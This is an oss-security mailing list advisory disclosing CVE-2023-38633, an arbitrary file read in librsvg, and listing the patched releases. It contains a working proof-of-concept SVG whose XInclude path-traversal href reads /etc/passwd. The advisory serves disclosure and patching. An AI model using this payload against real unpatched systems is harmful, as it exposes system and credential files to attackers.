|
|
Message-ID: <73b96607-5080-939c-d354-33da849d195d@oracle.com>
Date: Thu, 27 Jul 2023 13:36:17 -0700
From: Alan Coopersmith <alan.coopersmith@...cle.com>
To: oss-security@...ts.openwall.com
Subject: CVE-2023-38633 in librsvg: Arbitrary file read when xinclude href has
special characters
I haven't seen this go by yet, so for those who haven't seen it:
https://gitlab.gnome.org/GNOME/librsvg/-/issues/996 reports:
CVE-2023-38633: Arbitrary file read when xinclude href has special characters
This was reported by Zac Sims.
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg width="300" height="300" xmlns:xi="http://www.w3.org/2001/XInclude">
<rect width="300" height="300" style="fill:rgb(255,255,255);" />
<text x="10" y="100">
<xi:include href=".?../../../../../../../../../../etc/passwd" parse="text"
encoding="UTF-8">
<xi:fallback>file not found</xi:fallback>
</xi:include>
</text>
</svg>
This ends up actually including the contents of /etc/passwd, bypassing the
checks in UrlResolver::resolve_href().
The above linked bug report provides further analysis and links to merge
requests for the fixes. Fixes have been published in new releases of
librsvg for many release trains:
2.56.3
2.55.3
2.54.6
2.52.10
2.50.8
2.48.11
2.46.6
--
-Alan Coopersmith- alan.coopersmith@...cle.com
Oracle Solaris Engineering - https://blogs.oracle.com/solaris
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.